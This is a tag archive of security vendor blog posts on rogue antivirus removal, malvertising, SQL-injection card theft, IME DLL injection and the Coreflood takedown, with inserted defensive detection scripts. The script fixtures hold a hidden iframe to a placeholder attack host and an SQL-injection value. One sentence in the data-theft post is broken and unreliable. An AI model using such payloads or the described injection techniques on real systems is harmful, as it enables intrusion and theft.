Tag Archive | "Malware"

Osama bin Laden dead – so watch for the spams and scams

Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

The short version, according to the LA Times, is that bin Laden was tracked to a “comfortable mansion surrounded by a high wall in a small town near Islamabad, Pakistan’s capital.”

For bin Laden, it seems, the comfort is no more. “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, [President Obama], they killed Bin Laden.” Apparently, DNA tests have confirmed Bin Laden’s identity.

And there you have it.

Now you know – so you don’t need to click on any of the links you’re likely to see in email or on social networking sites offering you additional coverage of this newsworthy event.

Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory.

If in doubt, leave it out!

And even well-meant searches using your favourite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content. (Sophos Endpoint Security and Control and the Sophos Web Appliance are two examples.)

* If you go to a site expecting to see information on a specific topic but get redirected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” page – then get out of there at once. Don’t click further. You’re probably being scammed.

Posted in Sophos

Remove Antivirus Center (Uninstall Guide)

Antivirus Center is a rogue anti-spyware program from the same family as Internet Protection. This malware is installed onto your computer through the use of fake scanner pages and Trojans that pretend to be updates to Adobe Flash. When Antivirus Center is installed onto a computer it will be configured to start automatically when Windows starts. Once started it will perform a fake scan of your computer and then state that there are numerous infections present. If you attempt to remove any of these so-called infections with the program it will state that it is unable to do so until you purchase it. As none of the infection files actually exist on your computer, please disregard these scan results and do not purchase the program.

 

Antivirus Center screen shot

 

While Antivirus Center is running it will also display numerous fake security alert warnings that are designed to make you think that your computer has a severe security problem. The text of these messages is:

Antivirus Center
Your system has come under attack of harmful software. Click here to deactivate it.

Antivirus Center
External software tries to control variety of your system files. This may lead to breaking of some data in your system. Click here to protect remote access to your PC & delete these programs.

Antivirus Center
Spyware.IEMonster process is found. The virus is going to send your passwords from Internet browser (Explorer, Mozilla Firefox, Outlook & others) to the third-parties. Click here for further protection of your data with Antivirus Center.

Antivirus Center Firewall Alert
Suspicious activity in your registry system space was detected. Rogue malware detected in your system. Data leaks and system damage are possible. Please use a deep scan option.

Antivirus Center Firewall Alert
Antivirus Center has prevent a program from accessing the Internet.
“iexplore.exe” is infected with Trojan. This worm has tried to use “iexplore.exe” to connect to remove host and send your credit card information.

Antivirus Center Firewall Alert
Your computer is being attacked from a remote machine!
Block Internet access to your computer to prevent system infection.
Attacker IP: <ip address>
Attack type: RCPT exploit

Antivirus Center
Your computer is under the infections threat. Run instant shield protection to safe your data and prevent internet access to your credit card information. Select this to run instant shield.

Antivirus Center Firewall Alert
Warning
Keylogger activity detected!
Your account in social network is under attack. Click here to block unauthorized modification by removing threats (Recommended)

Just like the scan results, all of these warnings are fake and should be ignored.

As you can see, Antivirus Center was created for one reason: to scare you into thinking your computer is infected so that you will then purchase the program. Under no circumstances should you purchase Antivirus Center, and if you already have, you should contact your credit card company and dispute the charges, stating that the program is a computer infection. Finally, to remove this infection, and related malware, please use the removal guide below.

 

Symptoms that may be in a HijackThis Log:

O4 – HKCU\..\Run: [<random numbers and characters>] rundll32.exe “C:\Documents and Settings\All Users\Application Data\<random numbers and characters>.dat”, <random characters>

Guide Updates:

04/29/11 – Initial guide creation.

 


Automated Removal Instructions for Antivirus Center using Malwarebytes’ Anti-Malware:

 

  1. Print out these instructions as we may need to close every window that is open later in the fix.

  2. Reboot your computer into Safe Mode with Networking. To do this, turn your computer off and then back on and immediately when you see anything on the screen, start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:


    MalwareBytes Anti-Malware Screen

    Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode

    Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.

  3. It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.

  4. Before we can do anything we must first end the processes that belong to Antivirus Center so that it does not interfere with the cleaning procedure. To do this, please download RKill to your desktop from the following link.

    RKill Download Link – (Download page will open in a new tab or browser window.)

    When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.

  5. Once it is downloaded, double-click on the iExplore.exe icon in order to automatically attempt to stop any processes associated with Antivirus Center and other rogue programs. Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Antivirus Center when it terminates programs that may potentially remove it. If you run into these infection warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, this typically will allow you to bypass the malware trying to protect itself so that RKill can terminate Antivirus Center. So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. Do not reboot your computer after running RKill as the malware programs will start again.

    If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.

  6. Now you should download Malwarebytes’ Anti-Malware, or MBAM, from the following location and save it to your desktop:

    Malwarebytes’ Anti-Malware Download Link (Download page will open in a new window)


  7. Once downloaded, close all programs and Windows on your computer, including this one.

  8. Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MBAM onto your computer.

  9. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure you leave both the Update Malwarebytes’ Anti-Malware and Launch Malwarebytes’ Anti-Malware checked. Then click on the Finish button. If MalwareBytes’ prompts you to reboot, please do not do so.

  10. MBAM will now automatically start and you will see a message stating that you should update the program before performing a scan. As MBAM will automatically update itself after the install, you can press the OK button to close that box and you will now be at the main program as shown below.


    MalwareBytes Anti-Malware Screen

  11. On the Scanner tab, make sure the Perform full scan option is selected and then click on the Scan button to start scanning your computer for Antivirus Center related files.

  12. MBAM will now start scanning your computer for malware. This process can take quite a while, so we suggest you go and do something else and periodically check on the status of the scan. When MBAM is scanning it will look like the image below.


    MalwareBytes Anti-Malware Scanning Screen

  13. When the scan is finished a message box will appear as shown in the image below.


    MalwareBytes Anti-Malware Scan Finished Screen

    You should click on the OK button to close the message box and continue with the Antivirus Center removal process.

  14. You will now be back at the main Scanner screen. At this point you should click on the Show Results button.

  15. A screen displaying all the malware that the program found will be shown as seen in the image below. Please note that the infections found may be different than what is shown in the image.


    MalwareBytes Scan Results


    You should now click on the Remove Selected button to remove all the listed malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.

  16. When MBAM has finished removing the malware, it will open the scan log and display it in Notepad. Review the log as desired, and then close the Notepad window.

  17. You can now exit the MBAM program.

  18. As many rogues and other malware are installed through vulnerabilities found in out-dated and insecure programs, it is strongly suggested that you use Secunia PSI to scan for vulnerable programs on your computer. A tutorial on how to use Secunia PSI to scan for vulnerable programs can be found here:

    How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector

 

Your computer should now be free of the Antivirus Center program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes’ Anti-Malware to protect against these types of threats in the future.

If you are still having problems with your computer after completing these instructions, then please follow the steps outlined in the topic linked below:

Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help

 


 

Associated Antivirus Center Files:

%AllUsersProfile%\Application Data\<random numbers and characters>.dat
%AllUsersProfile%\Application Data\<random numbers and characters>.ico
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Antivirus Center.lnk
%UserProfile%\Desktop\Antivirus Center.lnk
%Temp%\ins2.tmp
%Temp%\mv3.tmp
%Temp%\wrk4.tmp

File Location Notes:

%UserProfile% refers to the current user’s profile folder. By default, this is C:\Documents and Settings\ for Windows 2000/XP, C:\Users\ for Windows Vista/7, and c:\winnt\profiles\ for Windows NT.

%Temp% refers to the Windows Temp folder. By default, this is C:\Windows\Temp for Windows 95/98/ME, C:\DOCUMENTS AND SETTINGS\ProfileName\LOCAL SETTINGS\Temp for Windows 2000/XP, and C:\Users\ProfileName\AppData\Local\Temp for Windows Vista and Windows 7.

%AllUsersProfile% refers to the All Users Profile folder. By default, this is C:\Documents and Settings\All Users for Windows 2000/XP and C:\ProgramData\ for Windows Vista/7.

 

Associated Antivirus Center Windows Registry Information:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “C:\WINDOWS\system32\rundll32.exe” = ‘C:\WINDOWS\system32\rundll32.exe:*:Enabled:Antivirus Center’
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “<random numbers and characters>”
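The HijackThis symptom line and the Run-key entry above share one shape: rundll32.exe launching a file with a data extension that sits directly under the All Users Application Data folder. The following Python script, added here as an illustration and not part of this removal guide or of HijackThis, parses HijackThis-style O4 lines and flags that shape. The sample lines are constructed (the random names are placeholders modelled on the guide's `<random numbers and characters>`), and the two heuristics it applies are this editor's, not the guide's.

```python
import re

# Constructed sample HijackThis O4 lines. The second is modelled on the symptom line in
# this guide (random names replaced by placeholders); the others are benign fillers.
SAMPLE_O4_LINES = [
    r'O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\user\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c',
    r'O4 - HKCU\..\Run: [a8f3k2m] rundll32.exe "C:\Documents and Settings\All Users\Application Data\a8f3k2m.dat", xk2',
    r'O4 - HKLM\..\Run: [SoundMAX] C:\Program Files\Analog Devices\SoundMAX\SMax4.exe /tray',
    r'O4 - HKCU\..\Run: [qwe12] "C:\Documents and Settings\user\Application Data\qwe12.exe"',
    r'O2 - BHO: (no name) - {placeholder} - (no file)',
]

# Accepts both the plain hyphen HijackThis writes and the en-dash the guide text uses.
O4_RE = re.compile(r'^O4 [-–] (?P<hive>HK\w+)\\\.\.\\Run: \[(?P<name>[^\]]*)\] (?P<cmd>.*)$')
# Extensions that are not a normal thing for rundll32.exe to host.
DATA_EXTENSIONS = ('.dat', '.tmp', '.ico')
# A file sitting directly under an "Application Data" root instead of a vendor subfolder.
APPDATA_ROOT_RE = re.compile(r'\\Application Data\\[^\\]+$', re.IGNORECASE)


def first_path(cmd):
    """First quoted path of a command line, or its first whitespace-delimited token.
    Unquoted paths containing spaces are cut at the first space, mirroring the
    ambiguity Windows itself has with them."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ''


def rundll32_payload(cmd):
    """If the command is rundll32.exe loading a file, return that file, else None."""
    parts = cmd.strip().split(None, 1)
    if len(parts) == 2 and parts[0].strip('"').lower().endswith('rundll32.exe'):
        return first_path(parts[1])
    return None


def assess_o4(line):
    """Parse one O4 line and return a verdict dict, or None if it is not an O4 line."""
    m = O4_RE.match(line)
    if not m:
        return None
    cmd = m.group('cmd')
    reasons = []
    payload = rundll32_payload(cmd)
    target = payload if payload is not None else first_path(cmd)
    if payload is not None and payload.lower().endswith(DATA_EXTENSIONS):
        reasons.append('rundll32.exe hosting a file with a non-DLL extension')
    if APPDATA_ROOT_RE.search(target):
        reasons.append('launch target sits directly in an Application Data root')
    return {'hive': m.group('hive'), 'name': m.group('name'), 'target': target,
            'suspicious': bool(reasons), 'reasons': reasons}


def scan_o4_lines(lines):
    """Return verdicts for every O4 line; lines of other HijackThis types are skipped."""
    verdicts = [assess_o4(line) for line in lines]
    return [v for v in verdicts if v is not None]


if __name__ == '__main__':
    for v in scan_o4_lines(SAMPLE_O4_LINES):
        flag = 'SUSPICIOUS' if v['suspicious'] else 'ok'
        print(f"{flag:10} [{v['name']}] {v['target']}")
        for reason in v['reasons']:
            print('           -', reason)
```

Neither heuristic proves infection on its own: a legitimate installer can drop a launcher straight into Application Data, so treat a hit as a prompt to check the file's signature and publisher, not as a verdict.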

 

Posted in Malware Removal

Compromised ads leading to TDSS rootkit infections

As we all know, compromised sites play an important role in web-distributed malware, acting as the conduit that guides user traffic to further malicious content. Sometimes the attackers get lucky and succeed in compromising a high-profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any third-party sites that happen to load the ads.

Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.

Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.

Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow):

Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.

Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.

This initiates the attack, triggering a chain of events summarised below:

  • ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
  • user’s browser and browser plug-ins are inspected to determine most appropriate exploit content to load. For this a legitimate library is used.
  • exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is currently serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.

As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.
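The chain above starts with an iframe injected into ad content. A static scan of the markup an ad server returns catches the un-obfuscated form of that first step, and a crude check for decode-then-write scripting catches the wrapper the post says is typically used. The Python below is an added example, not Sophos code and not the Mal/Iframe-U detection logic; the ad markup it scans is constructed, the off-site host in it is a placeholder, and the obfuscation markers and size thresholds are this editor's choices.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)
# Calls that an ordinary banner creative rarely needs but obfuscated loaders lean on.
OBFUSCATION_MARKERS = ('eval(', 'unescape(', 'fromCharCode', 'document.write(')
HEX_ESCAPE_RE = re.compile(r'\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}')


class AdScanner(HTMLParser):
    """Collects hidden off-site iframes and obfuscation-heavy inline scripts."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []
        self._script = None            # text chunks while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or '') for k, v in attrs}
        if tag == 'iframe':
            self._check_iframe(a)
        elif tag == 'script':
            self._script = []

    def handle_endtag(self, tag):
        if tag == 'script' and self._script is not None:
            self._check_script(''.join(self._script))
            self._script = None

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def _check_iframe(self, a):
        host = (urlparse(a.get('src', '')).hostname or '').lower()
        tiny = a.get('width', '').strip() in ('0', '1') or a.get('height', '').strip() in ('0', '1')
        hidden = tiny or bool(HIDDEN_STYLE_RE.search(a.get('style', '')))
        external = bool(host) and host not in self.own_hosts
        # Off-site frames are normal for ads; a hidden one is what the chain above relies on.
        if hidden and external:
            self.findings.append(('hidden-external-iframe', a.get('src', '')))

    def _check_script(self, body):
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        escapes = len(HEX_ESCAPE_RE.findall(body))
        if len(markers) >= 2 or escapes >= 40:
            self.findings.append(('obfuscated-inline-script', ', '.join(markers) or f'{escapes} escapes'))


def scan_ad_html(html, own_hosts):
    """Scan one ad response; own_hosts are the hosts the ad server legitimately serves from."""
    scanner = AdScanner(own_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed ad markup: a legitimate banner on the ad server's own host, a zero-size
# iframe pointing at a placeholder off-site host, and a decode-then-write inline script.
SAMPLE_AD_HTML = '''
<div class="banner"><a href="http://ads.example.org/click?id=7">
<img src="http://ads.example.org/campus.gif" width="468" height="60"></a></div>
<iframe src="http://placeholder-attack-host.example/in.cgi?3" width="0" height="0"
        style="visibility:hidden"></iframe>
<script type="text/javascript">
var s = "%3Cb%3Eharmless%3C%2Fb%3E";
document.write(unescape(s));
</script>
'''

if __name__ == '__main__':
    for kind, detail in scan_ad_html(SAMPLE_AD_HTML, {'ads.example.org'}):
        print(kind, '->', detail)
```

Because the real injection is heavily obfuscated, this scanner will usually fire on the script heuristic rather than on the iframe; running the same iframe check on the deobfuscated output is the step that confirms what the script writes into the page.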

We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!

As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out of date or unpatched version of OpenX.

Posted in Sophos

Data thefts far more common than just Sony and Epsilon

In the wake of the press reports concerning the recent data breaches at Sony and Epsilon, some organizations are getting the wrong idea about modern online attacks. The media largely chooses to cover mass-scale losses that affect large numbers of consumers from trusted brands.

While it is important to raise awareness about keeping your data safe online and alerting average internet users that they may be victims of data theft, most users are exposed to risk far more frequently and without their knowledge.

In a story published Tuesday on the Bank Information Security blog, Tracy Kitten detailed the exploits of Rogelio Hackett, Jr., who stole more than 675,000 credit cards. The resulting damages exceeded $36 million.

Hackett’s strategy? Find smaller organizations who have not coded their websites properly, allowing access to their data via SQL injection vulnerabilities. Based upon the reports I see from customers and other researchers, there are likely hundreds, if not thousands, of Hacketts out there systematically looking for low-hanging fruit.

Hackett may be sentenced to 12 years in prison for his crimes, but for every attacker who is caught, another one is ready to fill his shoes.
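The "not coded properly" failure the post refers to is, in most cases, a query assembled from user input by string concatenation. The Python below is an added example, not code from Sophos or from the Bank Information Security story: it puts the concatenating lookup beside the parameterized one against a constructed in-memory SQLite table, so the difference in behaviour for the same input is visible in the row counts rather than described.

```python
import sqlite3


def build_sample_db():
    """Constructed customer table standing in for a small business's web back end."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)')
    conn.executemany('INSERT INTO customers (email, card_last4) VALUES (?, ?)', [
        ('alice@example.com', '1111'),
        ('bob@example.com', '2222'),
        ('carol@example.com', '3333'),
    ])
    return conn


def lookup_vulnerable(conn, email):
    """Builds the statement by concatenation: the caller's text is parsed as SQL."""
    sql = "SELECT email, card_last4 FROM customers WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, email):
    """Binds the value as a parameter: the database never parses the caller's text."""
    return conn.execute('SELECT email, card_last4 FROM customers WHERE email = ?', (email,)).fetchall()


def demo():
    """Run both lookups with a normal address and with a value that closes the string
    literal and appends an always-true condition; return the row counts."""
    conn = build_sample_db()
    normal = 'bob@example.com'
    crafted = "x' OR '1'='1"
    return {
        'vulnerable_normal': len(lookup_vulnerable(conn, normal)),
        'vulnerable_crafted': len(lookup_vulnerable(conn, crafted)),
        'parameterized_normal': len(lookup_parameterized(conn, normal)),
        'parameterized_crafted': len(lookup_parameterized(conn, crafted)),
    }


if __name__ == '__main__':
    for name, count in demo().items():
        print(f'{name:22} {count} row(s)')
```

Parameterization fixes the parsing problem; it does not shrink what a successful query can reach, so the database account the web application logs in with should be limited to the tables and operations the site actually needs.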

The FBI issued an security hubs.

Posted in Sophos

Be Careful If Searching For Images of Kate Middleton’s Dress

Real-world events occasionally generate a massive number of online searches. Japan’s recent earthquake and the tsunami that followed are a good example of a sudden event that turned the world’s attention to Google. And as topics trend in Google’s search results, Search Engine Optimization (SEO) attacks are attempted. Our March 11th post urged caution while searching for information.

The post also noted that Google has been doing a pretty good job of keeping SEO attacks at bay and filtered out of their search results. Web results that is.

Since October of last year, we’ve seen a steady growth in image based SEO attacks. Because Google is winning the (cat and mouse) battle against malicious site SEO, some attackers have shifted to image searches. Image based SEO attacks are more of a technical challenge. Instead of following trends and then connecting to a hosted attack site, the attacker must instead connect a trending topic to a particular image, and then link that image to a compromised site, which then links to the attacker’s site.

It’s a fascinating evolution that our Threat Insights team has been investigating.

But we’ll provide more details about that in a future post.

Today, we want to mention what’s likely to be a heavily searched for image tomorrow, Kate Middleton’s wedding dress.

People aren’t simply going to want to read about the wedding of Prince William and Kate Middleton, they’re going to want to see it. And so tomorrow, we expect Google’s image search to be more popular than ever.

We’re already seeing some “royal wedding coverage” SEO attacks.

Here’s an example which includes some well known footballers in the results:

SEO image attacks

The image, called “0611-soccer-studs1-credit.jpg”, is linked to “lingerie-now-com”.

Google’s preview is loaded in the front, while the host site is loaded in the background.

SEO image attacks

What happens next is that the background site is linked to the attack site, which takes over the page and displays a warning message, an attempted scareware attack.

SEO image attacks

You can see the linkages here:

SEO image attacks

The site then renders an animated “Online Scan”:

SEO image attacks

All of the results are nonsense, of course; this example is from a clean test machine:

SEO image attacks

Unfortunately, SEO driven scareware attacks are very successful, relatively speaking. Consumers have been scammed out of millions of dollars by this type of attack.

So be wary of this potential threat if you’re among those searching for wedding pictures.

SEO image attacks

Google’s Web search result for “royal wedding” places the couple’s official site at the top of the page.

And here’s another timely example of an image based SEO attack targeting those that searched for US President Barack Obama’s birth certificate, which was released by the White House yesterday, from GFI Labs’ Christopher Boyd.

Posted in F-Secure

IME Injection Evolution

Recently, we found many malware samples using a smarter way to inject a chosen DLL into the part of the system related to IME management. Compared to the old IME injection tricks, it is much more difficult for users or anti-virus companies to discover.

As we know, at the beginning of last year many Chinese users found that they could no longer use certain language input methods. This type of virus caused many inconveniences to users. The first version of IME injection only substituted the IME file specified by the following registry entry:

HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0020804

Key:IME File

Value:*.ime

where E002 is a device identifier and 0804 is a language identifier, in this case Simplified Chinese. If you want, you can find more information about this registry key on MSDN.

If the IME file is replaced by the malware DLL, the original language input method cannot work properly. This could bypass many behaviour monitors, but the story didn’t last long, because this method could be easily discovered.

After that, the technology of IME injection was also updated. The next generation of IME injection was much more complicated; it needed three components. The first component was a management program, which dropped the other two components:

1. Fake IME file. This fake IME file always exports the following two functions:

IMESetPubString

IMEClearPubString

IMESetPubString is used to load the malware DLL specified by the management component.

2. The DLL to be loaded: the real payload of the malware.

The management component registers the fake IME file as the system default language input method, then sends the WM_INPUTLANGCHANGEREQUEST message to the specified windows to activate the fake IME file, which loads the real malware. This type of injection does not replace any of the user’s normal IME files, and it is a little more difficult to trace, but it still has its weaknesses: users can easily spot a strange IME choice in the language bar and newly added Keyboard Layouts registry entries, and the fake IME file is left on the user’s system. This type of injection was popular during the second half of last year, but now it has nearly disappeared.
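Both generations described so far leave a trace under the Keyboard Layouts key: generation I repoints an existing entry's IME File value, generation II adds an entry of its own. The Python below is an added example, not AVG code, that audits a snapshot of that key against three expectations and a baseline of IME file names taken from a clean machine. The snapshot and the baseline are constructed (layout texts and the .ime names are placeholders; the E0020804 entry reuses the 04f30730.tmp file name the post gives later), and the expectations themselves are this editor's reading of what a stock entry looks like.

```python
import re

# Constructed snapshot of HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layouts, keyed by
# layout id. E0020804 models the generation-I tampering (IME File repointed at the malware's
# 04f30730.tmp); E0030804 models a generation-II fake layout registered beside the real ones.
SAMPLE_LAYOUTS = {
    '00000409': {'Layout File': 'KBDUS.DLL', 'Layout Text': 'US'},
    'E0010804': {'Layout File': 'kbdus.dll', 'Layout Text': 'Chinese (Simplified) - placeholder IME A',
                 'IME File': 'imea.ime'},
    'E0020804': {'Layout File': 'kbdus.dll', 'Layout Text': 'Chinese (Simplified) - placeholder IME B',
                 'IME File': r'C:\Documents and Settings\All Users\Application Data\04f30730.tmp'},
    'E0030804': {'Layout File': 'kbdus.dll', 'Layout Text': 'Chinese (Simplified) - placeholder IME B',
                 'IME File': 'imeb.ime'},
}
# Constructed baseline: IME file names exported from a clean reference machine.
BASELINE_IME_FILES = {'imea.ime', 'imeb_real.ime'}

LAYOUT_ID_RE = re.compile(r'^([0-9A-Fa-f]{4})([0-9A-Fa-f]{4})$')


def split_layout_id(layout_id):
    """Split an 8-hex-digit layout id into (device id, language id), e.g. E002 and 0804."""
    m = LAYOUT_ID_RE.match(layout_id)
    return (m.group(1).upper(), m.group(2).upper()) if m else (None, None)


def audit_keyboard_layouts(layouts, baseline_ime_files):
    """Return one finding per layout whose IME File value does not look like a stock entry."""
    baseline = {f.lower() for f in baseline_ime_files}
    findings = []
    for layout_id, values in layouts.items():
        ime_file = values.get('IME File')
        if ime_file is None:
            continue                      # plain keyboard layout, nothing gets loaded from it
        reasons = []
        bare = ime_file.replace('/', '\\').rsplit('\\', 1)[-1]
        if bare != ime_file:
            reasons.append('value carries a directory path; stock entries are a bare file name')
        if not bare.lower().endswith('.ime'):
            reasons.append('extension is not .ime')
        if bare.lower() not in baseline:
            reasons.append('file name absent from the clean-machine baseline')
        if reasons:
            device_id, lang_id = split_layout_id(layout_id)
            findings.append({'layout_id': layout_id, 'device_id': device_id, 'language_id': lang_id,
                             'ime_file': ime_file, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in audit_keyboard_layouts(SAMPLE_LAYOUTS, BASELINE_IME_FILES):
        print(f"{f['layout_id']} (device {f['device_id']}, language {f['language_id']}): {f['ime_file']}")
        for reason in f['reasons']:
            print('   -', reason)
```

On a live system the snapshot would come from a registry export of that key; the check says nothing about generation III, which, as the post goes on to explain, changes no registry value and so has to be caught at the point where explorer.exe loads the DLL.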

Now we have found IME injection generation III. It’s smarter and more difficult to discover. This injection does not change any registry entries or drop any fake IME file. It is mainly based on its authors’ study of two functions exported from imm32.dll: ImmLoadLayout and ImmGetImeInfoEx.

ImmLoadLayout: this function opens the Keyboard Layouts key and gets the IME file name.

Image1

Before invoking this function, the malware has already hooked the function ZwQueryValueKey.

The hook procedure looks like the following:

Image2
 

If the value query request is for the registry value IME File, the hook changes the returned value to the malware’s file name, 04f30730.tmp, and then unhooks ZwQueryValueKey.

After the above process, the malware posts a message to explorer.exe:

Image3

Then explorer.exe calls ImmLoadIME, and this function calls LoadLibrary to load the DLL returned by ImmGetImeInfoEx. The following snapshot shows the call stack of explorer.exe after it received the WM_INPUTLANGCHANGEREQUEST message:

Image4

Now the malware has achieved its goal: the malicious DLL has been loaded by explorer.exe.

Before the DLL is loaded, Windows invokes ApphelpCheckIME to check the legality of the DLL, but it does not check whether this DLL exports any IME functions.

Posting a language change message will cause explorer.exe to load an arbitrary DLL, even when this DLL does not export any IME functions, which is really dangerous!

Many functions of imm32.dll are still undocumented, and this area is becoming more and more attractive to malware writers. We don’t think this is the end, but be sure that we will pay more attention to new IME injection methods.

 

Frank Zheng, Stanley Zhu & Hynek Blinka

Posted in AVG

FBI takes on Coreflood botnet – but is this a step too far?

Two weeks ago, the Federal Bureau of Investigation (FBI) obtained a court order in Connecticut, USA. This court order allowed the FBI to undertake an anti-cybercrime operation of a sort which had never been authorised before in America.

Not only did the cops seize various US-based Command and Control (C&C) servers belonging to the Coreflood botnet, but they also redirected all traffic intended for those servers to a surrogate server under their own control.

When infected PCs connected to the surrogate, the cops instructed the bot process to terminate, providing that the PC appeared to be in the US, and thus under their jurisdiction.

What made this court order a first in the US is that it gave law enforcement permission to interfere directly with computers belonging to users who weren’t being investigated, or charged with any crime.

The motivation for this novelty was that the Coreflood bot family is notorious for exfiltrating data from infected PCs. As the FBI’s Temporary Restraining Order puts it, Coreflood sets out:

to commit wire fraud and bank fraud in violation of Title 18, United States Code, Sections 1343 and 1344, and to engage in unauthorised interception of electronic communications in violation of Title 18, United States Code, Section 2511.

But the Electronic Frontier Foundation (EFF), a worldwide privacy advocacy group, expressed concerns about this sort of legally-endorsed interference. In particular, the EFF pointed out that there is something unappealing about sending commands of any sort to unknown malicious code on someone else’s computer without their explicit permission.

This may sound like a petty objection – and perhaps, in the real world, it is – but unless you know exactly which variant of the bot is on each PC, there is always a potential risk with trying to use a bot against itself. What if the crooks have deliberately rewired the “stop” command to carry out a “format hard drive” operation instead?

Nevertheless, the FBI went ahead, and the exercise seems to have been a success. So much so, in fact, that the cops went back to court over the weekend to ask for the two-week court order to be extended for a further month.

The new court application shows that the original two-week intervention had a measurable effect, documenting graphically the decrease in US-based PCs which tried to connect to the FBI’s surrogate C&C server:

The cops also compared the relative drop in Coreflood activity in the US and overseas. Sending “stop” commands to the infected PCs was noticeably more effective than simply cutting those PCs off from the C&C servers:

The big difference in the new court application is that the FBI is now asking to be allowed to uninstall Coreflood from infected PCs, not just to stop the bot process temporarily.

The FBI says it will only attempt this sort of automatic remote disinfection on “infected computers of identifiable victims who have provided written consent to do so.” This should keep the EFF happy, but it won’t be half as effective as blindly going ahead with automatic disinfection, without waiting for an exchange of written agreements.

